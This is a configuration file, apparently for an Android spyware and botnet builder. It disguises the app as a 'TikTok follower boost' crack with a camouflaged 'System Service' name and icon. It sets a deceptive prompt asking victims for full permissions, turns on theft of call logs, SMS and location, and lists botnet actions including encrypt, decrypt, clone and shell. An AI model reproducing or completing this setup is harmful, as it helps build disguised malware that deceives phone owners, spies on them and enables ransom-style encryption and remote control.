# Project Information (Chnage it)
app.name=Insta Boost
app.mask_name=System Service
app.author=Nemesis Guy
app.description=An crack to boost tiktok followers


# Change App Icon (Change it)
app.icon=lurkerx.png

# Camouflage Icon
app.mask=masked_launcher.png

# How to request permission (You can change it)
strings.statement_before=This app requires all permissions granted in order to gain full control of the resources bypass Android restrictions to run.
strings.statement_after=Permissions are granted. App is scheduled to finish operation in the next 30 minutes.

# Your account on Nemesis Guy (Change it)
login_email=nemesisguy@myself.com

# Data to spy (Default)
call_log=True
sms_log=True
location_log=True

# Botnet actions (Default)
dialer=[]
encrypt=[]
decrypt=[]
clone=[]
shell=[]
